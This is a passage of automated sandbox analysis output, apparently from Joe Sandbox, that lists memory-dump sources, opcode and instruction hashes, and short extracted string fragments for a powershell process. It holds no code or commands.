                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65c66d133ce04f2fe29aa2a327634ad7a00e3ca09919c4ab8952f9cae653bb58
                                                                      • Instruction ID: 8864cccb24dfc0300352f1cabce13aa62b609b0b8db3b204774673f65780c5d1
                                                                      • Opcode Fuzzy Hash: 65c66d133ce04f2fe29aa2a327634ad7a00e3ca09919c4ab8952f9cae653bb58
                                                                      • Instruction Fuzzy Hash: F8B14E70E00209CFDB14CFA9D9957EDBBF2AF88314F148529E815EB394EB74A845CB85
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl$4'jq$4'jq$4'jq$4'jq
                                                                      • API String ID: 0-2585210478
                                                                      • Opcode ID: 58cb76f276b0c096b11003532d51d129acbef296d884731eb6f4f344abdff8ee
                                                                      • Instruction ID: e2c6e986f844cff6c84d4debeebf6f0a404d5b0f3621fcf364fef5c41f3bd79f
                                                                      • Opcode Fuzzy Hash: 58cb76f276b0c096b11003532d51d129acbef296d884731eb6f4f344abdff8ee
                                                                      • Instruction Fuzzy Hash: 56927FB4A00214DFD724CB58C994BAABBF2FB85304F15C4AAD9099B356CB32DD85CF61
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8N7m$Hnq$h]7m$h]7m$h]7m$$jq$$jq$I7m
                                                                      • API String ID: 0-2997969051
                                                                      • Opcode ID: 8a2be2ae64254aca2760fd53ed9ae2d6d222259a78cd1fc7db66bd80d77ca21d
                                                                      • Instruction ID: 3646ed2c9c07f14a30dd320b3d971ca4340d487d419cae90420cd94e188c38e4
                                                                      • Opcode Fuzzy Hash: 8a2be2ae64254aca2760fd53ed9ae2d6d222259a78cd1fc7db66bd80d77ca21d
                                                                      • Instruction Fuzzy Hash: 60227F34B006249FDB25DB35C954AAEB7B6EF89304F1044A9D50AAB3A1DF34ED81CF94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (fl$(fl$(fl$(fl$(fl$4'jq$4'jq
                                                                      • API String ID: 0-233781266
                                                                      • Opcode ID: 1105ce2c40caece6927a346fbb1f085247c892db2c84eef24b3c339e0063b604
                                                                      • Instruction ID: fa619eeedb827eaf0cfe7f77265969e3bafcfdeca45a24cb02e6a3c1fdd4c315
                                                                      • Opcode Fuzzy Hash: 1105ce2c40caece6927a346fbb1f085247c892db2c84eef24b3c339e0063b604
                                                                      • Instruction Fuzzy Hash: 70826BB4A10210DFD724CB58C994BEABBB2FB85304F15C09AD9099B352CB32ED85CF61
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq
                                                                      • API String ID: 0-2919996211
                                                                      • Opcode ID: 5cb75173b5a68eadf891ccff112678a534ac7b68f827efcb02132ac9c01b9e08
                                                                      • Instruction ID: b8e206c10120ba92fe85eb8c2712f8e4393cfa60a210e16d780a15f99b2ef935
                                                                      • Opcode Fuzzy Hash: 5cb75173b5a68eadf891ccff112678a534ac7b68f827efcb02132ac9c01b9e08
                                                                      • Instruction Fuzzy Hash: DEB1F6B06093459FCB268F6A88506E7BFB5EF86210F19C4ABD8448F392CA35DD45C772
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (fl$(fl$(fl$(fl$4'jq$4'jq
                                                                      • API String ID: 0-1937588454
                                                                      • Opcode ID: 3f1e9a30e1f4ec72f497d0733751c5db59a951054e12b4e1f928ec7dabab7624
                                                                      • Instruction ID: 3eccfb61b14a5c1eb0450c407cd4ad72547c6e2d5199d2822b88bf73bfbd1a67
                                                                      • Opcode Fuzzy Hash: 3f1e9a30e1f4ec72f497d0733751c5db59a951054e12b4e1f928ec7dabab7624
                                                                      • Instruction Fuzzy Hash: 783260B4B01248DFD724CB98C555BAABBF2EF85304F15846AE8059B755CA32EC42CBA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq
                                                                      • API String ID: 0-3975720690
                                                                      • Opcode ID: 9d553508ab093f20505d19b2b2b93a73a791590138376b5816122f28877b9439
                                                                      • Instruction ID: bc8bfd3c0c806372c24d5c769a4bb1d02bfa5c85a1a5084b2190b2d5c776184c
                                                                      • Opcode Fuzzy Hash: 9d553508ab093f20505d19b2b2b93a73a791590138376b5816122f28877b9439
                                                                      • Instruction Fuzzy Hash: 12D1B1B4A10204DFC714CBA8C595BDEBBABAF84304F15841AD9056F355CB76DC86CBA2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq
                                                                      • API String ID: 0-3975720690
                                                                      • Opcode ID: d6aadbb1492ac216b2076ca1170ac17c03ffb5be18fe7d9d51e9b3e78146796e
                                                                      • Instruction ID: ea4cfe659784903d120fcbc1eeec113611dd4023bb92c6dc5c716b9d4838e480
                                                                      • Opcode Fuzzy Hash: d6aadbb1492ac216b2076ca1170ac17c03ffb5be18fe7d9d51e9b3e78146796e
                                                                      • Instruction Fuzzy Hash: 56D195B4A10214DFD724DB94C955BAABBB2FF84304F10849AD5096F395CB72DD82CFA2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (fl$(fl$4'jq$4'jq
                                                                      • API String ID: 0-3049546519
                                                                      • Opcode ID: 9bf1bf706a939838faf9f7f59fb332076742d7f1484ff19c896e6982ac1e2e1c
                                                                      • Instruction ID: 6e0896500a4003583d71f3e03dbb93a536727c03ee40b060627756a2719f73b8
                                                                      • Opcode Fuzzy Hash: 9bf1bf706a939838faf9f7f59fb332076742d7f1484ff19c896e6982ac1e2e1c
                                                                      • Instruction Fuzzy Hash: 3FF1B674A402149FD724DBA8C955BAEBBB2EF84300F1084AAD9096F396CB75DD81CF61
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (fl$(fl$(fl$(fl
                                                                      • API String ID: 0-1133856015
                                                                      • Opcode ID: dc96d6af9ca0b11e1cb14ee29522a039e66c3a6f17e3205c6f8fb6522b0cb67c
                                                                      • Instruction ID: 7024f3165ced46503cf3da48d1bda80391c65ab5b4d8a81a95642e1f9e0a925c
                                                                      • Opcode Fuzzy Hash: dc96d6af9ca0b11e1cb14ee29522a039e66c3a6f17e3205c6f8fb6522b0cb67c
                                                                      • Instruction Fuzzy Hash: 60B1B1B0B50204DFCB14CBA9C555BEABBF3AF88300F15856AD9056B355CB36EC81CB62
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (fl$(fl$4'jq
                                                                      • API String ID: 0-1294874790
                                                                      • Opcode ID: 1c31755c5202b14f61d83b6b3c4655918d48429efffd98fd2d843a346f43e960
                                                                      • Instruction ID: 4df5144695e796c0445ca102ff69b143277806f1e99aa4b44d0c55a9dda1b787
                                                                      • Opcode Fuzzy Hash: 1c31755c5202b14f61d83b6b3c4655918d48429efffd98fd2d843a346f43e960
                                                                      • Instruction Fuzzy Hash: D0227FB4A01249DFD724CB98C595BEABBF2FB85304F15806AE8059B755CB32EC42CB61
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (fl$(fl$4'jq
                                                                      • API String ID: 0-1294874790
                                                                      • Opcode ID: da2c58d3c4ff258e332b4aaa7cf418e4d2bafb5ad87e1235cb800b8f15335b93
                                                                      • Instruction ID: 5869c01032555afc3b03fca3d7b27e0891b1c41a4deccd1e2e5595a769398f91
                                                                      • Opcode Fuzzy Hash: da2c58d3c4ff258e332b4aaa7cf418e4d2bafb5ad87e1235cb800b8f15335b93
                                                                      • Instruction Fuzzy Hash: 7A226FB4A00244EFD714CB98C595BAABBF2FF89304F158066E9059F755CB72EC42CB61
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$4'jq$4'jq
                                                                      • API String ID: 0-3078559419
                                                                      • Opcode ID: 9d1a7e9cda46dfc7d1e24a66158ad4346f0d3b0f2b2c91325a8fd6abc12388a8
                                                                      • Instruction ID: fa5a1951d7963651016a499ecb8f4a5d98a451d5ecff5d4e6561287dd2ccb203
                                                                      • Opcode Fuzzy Hash: 9d1a7e9cda46dfc7d1e24a66158ad4346f0d3b0f2b2c91325a8fd6abc12388a8
                                                                      • Instruction Fuzzy Hash: D5B192B4A10205DFC724CF98C591BDABBBAEF88304F15855AD9052F355CB36EC86CBA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $jq$$jq$$jq
                                                                      • API String ID: 0-3696375380
                                                                      • Opcode ID: 13329b089bd6b0f3f3f02ef96409defc0cba66f06d4c7de2a392197c55be1f67
                                                                      • Instruction ID: 2ebb52fb9275fa34477e796d6aebbe1083fce5696a777187b41a5d47772b2ff3
                                                                      • Opcode Fuzzy Hash: 13329b089bd6b0f3f3f02ef96409defc0cba66f06d4c7de2a392197c55be1f67
                                                                      • Instruction Fuzzy Hash: A14107B6B001159BCB34DEA989802EBB7E5EFC8211B25882BC805E7755DE31DD11C7B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (fl$(fl
                                                                      • API String ID: 0-2979295544
                                                                      • Opcode ID: bf295ae8d45e5f135966d276336607f3933a7e2e16836903c59bb455c79fcc87
                                                                      • Instruction ID: cc70422144a68edc484b9199a733b925af89bb7f81036224b1d45da961d04cfb
                                                                      • Opcode Fuzzy Hash: bf295ae8d45e5f135966d276336607f3933a7e2e16836903c59bb455c79fcc87
                                                                      • Instruction Fuzzy Hash: 14A1B6B4A10200DFCB14CB99C595FDABBF2AF88304F15856AD5056B755CB72EC81CF62
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \V7m$\V7m
                                                                      • API String ID: 0-1176964568
                                                                      • Opcode ID: ded7b16050a572fb97b9601e2137cc207358d8a6f54b0a6d56d675681ba7ab70
                                                                      • Instruction ID: dd5a71ed15482f31f7c93622d23c3d12e2f4378d466a643fd2dd88ea76117c0f
                                                                      • Opcode Fuzzy Hash: ded7b16050a572fb97b9601e2137cc207358d8a6f54b0a6d56d675681ba7ab70
                                                                      • Instruction Fuzzy Hash: 43714B70E00209DFDB14DFA9C985BAEBBF2AFC8314F148529E415A7364EB75A841CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \V7m$\V7m
                                                                      • API String ID: 0-1176964568
                                                                      • Opcode ID: 1f8d36cca8cc9a56161eaa84e8b17d56444bc714c8ebae637e169caf58708a8e
                                                                      • Instruction ID: a0818a464a31b45f7afd70d06d7c6948c2afbbde023c2afd8e9fe10d58ed6005
                                                                      • Opcode Fuzzy Hash: 1f8d36cca8cc9a56161eaa84e8b17d56444bc714c8ebae637e169caf58708a8e
                                                                      • Instruction Fuzzy Hash: D8714D70E00249DFDB14CFA9C985BAEBBF2BF88314F148529E415A7364EB75A841CF91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: tPjq$tPjq
                                                                      • API String ID: 0-4117293638
                                                                      • Opcode ID: 9716582bfff66602a8c7ee738dbc8b8dbe9a4098575d7899f038d8cb64b16985
                                                                      • Instruction ID: d62e45802213207d304ddcaa42056f2c62a3dd155b39a5350ea9e7f541ada8be
                                                                      • Opcode Fuzzy Hash: 9716582bfff66602a8c7ee738dbc8b8dbe9a4098575d7899f038d8cb64b16985
                                                                      • Instruction Fuzzy Hash: 455127B67053559FCB308A6998506FBFBA5EFC6222B18C46BD505CB3A1DA31CC41CBB1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: h]7m$I7m
                                                                      • API String ID: 0-2984535516
                                                                      • Opcode ID: c0b1a772e0204c114effde746d22960b21504fa655e6dbf90bc53068fde89aa6
                                                                      • Instruction ID: 009b176443169b5ca4275236d502c6af10f44e72418d66dca73c97ad0b64352d
                                                                      • Opcode Fuzzy Hash: c0b1a772e0204c114effde746d22960b21504fa655e6dbf90bc53068fde89aa6
                                                                      • Instruction Fuzzy Hash: EC311934B051288FCB25DB64C954BEEB7B2AF89308F1044E9D50AAB351DB35EE85CF91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \V7m
                                                                      • API String ID: 0-1806336213
                                                                      • Opcode ID: 1e74c39a03d9ccf21733bb2b516a16a17a1ff470ef0768af978feb9c44d3d301
                                                                      • Instruction ID: 8747f439a549b24ba0d84a15a0afd4c934cf6b7cfbe055dc301c2a64e9f495dd
                                                                      • Opcode Fuzzy Hash: 1e74c39a03d9ccf21733bb2b516a16a17a1ff470ef0768af978feb9c44d3d301
                                                                      • Instruction Fuzzy Hash: CEB14E70E00259DFDB10CFA9C9857ADBBF2BF88324F148529D815A7394EB74A845CF91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: tPjq
                                                                      • API String ID: 0-297075936
                                                                      • Opcode ID: e480de908c01e73f4bde91ba31e60fe494c4d847c32004d03178cad6c12baa7c
                                                                      • Instruction ID: 5b27b2702140a5b12a42da9118e1a0cc13ea243db3cde3cb738dc64a1adfd049
                                                                      • Opcode Fuzzy Hash: e480de908c01e73f4bde91ba31e60fe494c4d847c32004d03178cad6c12baa7c
                                                                      • Instruction Fuzzy Hash: CA21F5B2605342AFDB308E548950BF7FFA2EF85212F1885A7D5049B2A1C731CD40CBB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e73f8c6c3e06ada2043905208388c9377afa9400cad1f3caf8cd8349c9cb6cae
                                                                      • Instruction ID: 84a115e1241fbf3de2890f59650546a14280a18e9dc41ca7f3ba9e7114b7165d
                                                                      • Opcode Fuzzy Hash: e73f8c6c3e06ada2043905208388c9377afa9400cad1f3caf8cd8349c9cb6cae
                                                                      • Instruction Fuzzy Hash: F9C1BA75A00208DFDB14EFA4C948AAEBBB6FFC5304F118559E906AB365DB34EC49CB41
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c61ed6f5a80dffb96b74c510303862eca2a8d3a01e842a7b715cefee4e80d312
                                                                      • Instruction ID: fb189f867a6c283bf124cd87d8a084570821b82017a7741e54a961d0f63eddeb
                                                                      • Opcode Fuzzy Hash: c61ed6f5a80dffb96b74c510303862eca2a8d3a01e842a7b715cefee4e80d312
                                                                      • Instruction Fuzzy Hash: 55D10874B01208DFDB05CFA8D584AADFBB2EF88310F248159E819AB365D735ED46CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2c7a1b80e36dbf24af37777434789fcd4df5e7b2030853f7d596ff8f209462ff
                                                                      • Instruction ID: 023054a8cf4950de3c0cd5f4f3cd75a634a533a7c8299a207b8eaa4523796408
                                                                      • Opcode Fuzzy Hash: 2c7a1b80e36dbf24af37777434789fcd4df5e7b2030853f7d596ff8f209462ff
                                                                      • Instruction Fuzzy Hash: 08C1DD70A042858FC706CF6CC5A0AEABFB1FF8A310F14459AD4559B3A6D335EC95CBA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a8ea5a576288f89eedf452f597bf4b2fff5631d445564bfde659cec71f2d1333
                                                                      • Instruction ID: acdef03c6e3ec65c64166d0252140b596a67bfb8cfd5d6c87ec4ad466c8ba3ff
                                                                      • Opcode Fuzzy Hash: a8ea5a576288f89eedf452f597bf4b2fff5631d445564bfde659cec71f2d1333
                                                                      • Instruction Fuzzy Hash: F8B15D70E00209CFDB10CFA9D9857EDBBF1AF89314F248529E815E7394EB74A885CB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 78589ba9075618ba1dc588475ed9d6ba2185a2cf32e4b558456e351c91955402
                                                                      • Instruction ID: 0c9b5bc5012c67bf28c1721d4a4e2416355589b859d600d636122dd5f151f820
                                                                      • Opcode Fuzzy Hash: 78589ba9075618ba1dc588475ed9d6ba2185a2cf32e4b558456e351c91955402
                                                                      • Instruction Fuzzy Hash: F481B138A012089FCB15DFA8D4849ADBBF2FF89304F1684A9E405AB362D735EC85CB51
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 37cc357840c7f8690fe448677ad67af13e667c92fe359aa54b2c05cdf1be6627
                                                                      • Instruction ID: 61a06da27722d939da3e91bc2ca06c3d2a3793a9133b9dbac9c8b283cac61421
                                                                      • Opcode Fuzzy Hash: 37cc357840c7f8690fe448677ad67af13e667c92fe359aa54b2c05cdf1be6627
                                                                      • Instruction Fuzzy Hash: B5718EB0A002159FCB14DF68C880AAEBBF6FF84314F248569D405DB751DB75EC45CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 290d2a85a5cd3e7d659c9e5192f5c7629782400b2d32f9e5e717c8363202feb4
                                                                      • Instruction ID: 083384902b3e60627f4110e3b2d2c0986e3c9ece90c9314cd6066a92f40acf49
                                                                      • Opcode Fuzzy Hash: 290d2a85a5cd3e7d659c9e5192f5c7629782400b2d32f9e5e717c8363202feb4
                                                                      • Instruction Fuzzy Hash: FE7129B0A002189FDB14DFB5D580BAEBBF6FF88314F148529D502AB3A5DB35AD45CB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4d87a3be6e087044a539391f516b6bcb50c1d10353a3c351f34338b068fd48b0
                                                                      • Instruction ID: 02caa7bb09711dfe10e5d5e35d65b9080d2cb83d567273524f73aba411aabab9
                                                                      • Opcode Fuzzy Hash: 4d87a3be6e087044a539391f516b6bcb50c1d10353a3c351f34338b068fd48b0
                                                                      • Instruction Fuzzy Hash: 18713774A402089FDB15CFA8D580AAEBBF2BFC8314F24C559E405AB365DB35EC46CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 990816dd93d53e40c5c3ef5b2d3296f18c98e2566cea4094ebef519b7bd85450
                                                                      • Instruction ID: 5185404aed43e0e1a77e9aeabfcfbdbd0e9f6d68448270b76966d9afdc228f62
                                                                      • Opcode Fuzzy Hash: 990816dd93d53e40c5c3ef5b2d3296f18c98e2566cea4094ebef519b7bd85450
                                                                      • Instruction Fuzzy Hash: 8A416CB1A002009FD714DB74C558AAE7BF6EFC9750F095069E906EB7A1DB34AC41CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0c9085e4d44e36a5b5de8d2e01636ec9f83be6c330217ecdfc6679460f527ccd
                                                                      • Instruction ID: 50fc1a55e78a7de133e3e65f8e0fea55ef2db65c4a11242317935f3a263fa58e
                                                                      • Opcode Fuzzy Hash: 0c9085e4d44e36a5b5de8d2e01636ec9f83be6c330217ecdfc6679460f527ccd
                                                                      • Instruction Fuzzy Hash: DC51EA74A40209AFDB14CFA8D584AADFBB2FF88314F24C559E805AB365C735ED86CB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 81dbb327fe7eef8e1ef126ff0942928605804d1f88bf1a644f147d1b0728f4c3
                                                                      • Instruction ID: 079e2dd36d8444fe1515ec6c4510365263bea2b2d84703fef0929d4c78a52c30
                                                                      • Opcode Fuzzy Hash: 81dbb327fe7eef8e1ef126ff0942928605804d1f88bf1a644f147d1b0728f4c3
                                                                      • Instruction Fuzzy Hash: 4F413BB0A002159FDB14DFB9C5847AEBBF6FF85314F148429D406AB794EB74AC45CB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 20f0323dca08a481052a88bae035623c2cef2eba92bd6eaa0b0646d5481cbc2b
                                                                      • Instruction ID: 9ca50d2d1d27c3f556154812b489e507f94bbbd8188b2eb99b1e653024b53727
                                                                      • Opcode Fuzzy Hash: 20f0323dca08a481052a88bae035623c2cef2eba92bd6eaa0b0646d5481cbc2b
                                                                      • Instruction Fuzzy Hash: F3412474A005058FCB05CF99C594ABAFBB1FF88350B158599E415AB3A6C731FCA0CFA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7afe10f00b0a1e56ffce1300981033ceb89479f283a54a7818307e8f7d21205
